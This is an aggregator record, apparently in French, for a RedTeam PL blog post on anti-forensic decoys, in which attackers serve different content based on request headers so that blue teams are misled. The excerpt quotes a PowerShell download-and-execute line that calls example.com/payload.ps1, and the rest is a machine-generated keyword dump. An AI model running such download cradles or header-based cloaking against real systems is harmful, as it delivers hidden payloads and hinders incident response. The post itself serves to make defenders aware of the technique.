One Article Review
| Source |  RedTeam PL |
|---|---|
| Identifiant | 1798886 |
| Date de publication | 2020-01-09 19:05:39 (vue: 2020-07-09 15:05:43) |
| Titre | Deceiving blue teams using anti-forensic techniques |
| Texte | Brief introductionIn this short post I would like to demonstrate one of the techniques used by red teamers and real attackers to set up decoys for blue teamers. Defenders should be aware that they are not alone in setting traps such as honeypots, advanced attackers are also actively looking to fool blue team (usually the goal is to make analysis more difficult and keep malicious content operational for longer period of time).Headers dependent responseLet's assume that the blue team analyzes an incident and they had found that remote PowerShell payload has been executed:IEX (New-Object Net.WebClient).DownloadString("https://example.com/payload.ps1") ( |
| Envoyé | Oui |
| Condensat | echo http +0100 +0200 +http://code /book/ /favicon /payload 06/jul/2017:20:45:03 0content 102 109 13:17:29 15/dec/2019:14:04:52 15/dec/2019:14:04:57 15/dec/2019:14:12:33 15/dec/2019:14:17:24 1650 167 178 194 1host: 200 2019 228 2623 29259 3660 3763 404 4549 4718 5423 8unfortunately :107 able about above accessible actively additionally address addresses advanced after against age=15552000x agent ago aliveas all alone already also always analysis analysis:if analyst analyzes another anti antivirus any app appengine appid: applewebkit/537 application are article as15169 as50881 asn assume attack attacker attackers aware based because been before blue bounty brief browser bug but calc can case cat charset=utf chrome/31 chrome/49 cmd code collision com com/appengine; com/gui/home/url com/maxmind/geoip2 com/payload comconnection: command company concept condition conditions conducting contains content could country crawlers create csirt curl curl/7 cut dec deceiving deceptive decoys defenders deleted demonstrate dependent deploying described determine different difficult disclosed dns domain don download downloadstring due easily effective else empty ending engine error eset etc example example:$ examples except exe execute executed:iex expression fact favicon find first fool forensic found founddate: frame from fun gecko geoip get gmtstrict goal gone… google google; hackers had has have header headers honeypots however htaccessrewriteengine html http http/1 http://example httpd https://blog https://developer https://example https://github https://socialmediascanner https://www hunters ico implement incident information internal internally introductionin invoke ip/asn ipconfig/all item just keep khtml kiddie leaked length: level life like likely linux logs longer look looking looks lot made make malicious many max media mentioned mod more most mozilla mozilla/5 msie name need net new non nope nosniffcontent not number object obvious off often one only onrewriterule operational options: org/en organisation origin other otherwise outside parses participating payload perform period php pl/2019/10/internal policy#integration polish possible post powershell programs proof provided ps1 ps1$ ps1http/1 ps1invoke publicly purposes raw real really red redteam referer rel=noreferrer related remember remote request requested requests response responseanother responselet retrieve return returned rewrite rule rule:$ safari/537 same sameoriginx say scanner scenario script scripts second security security: send sends sent server set setting severe short should shown similar simple simply simulations skills social socialmediascanner software some sometimes soon stated such summarythis sun switch:$ switching:if system system32 systems s~virustotalcloud targeted team teamer teamers teams technique techniques text/html; them then these this:1 this:91 threat ticket time transport trap traps trick true try type type: url urls us/docs/web/http/headers/referrer use used user uses using usually versa very vice viewed virustotal web webclient what when where which will windows windows; wireshark:get world would x11; x86 years “hidden” “malicious” |
| Tags | |
| Stories | |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.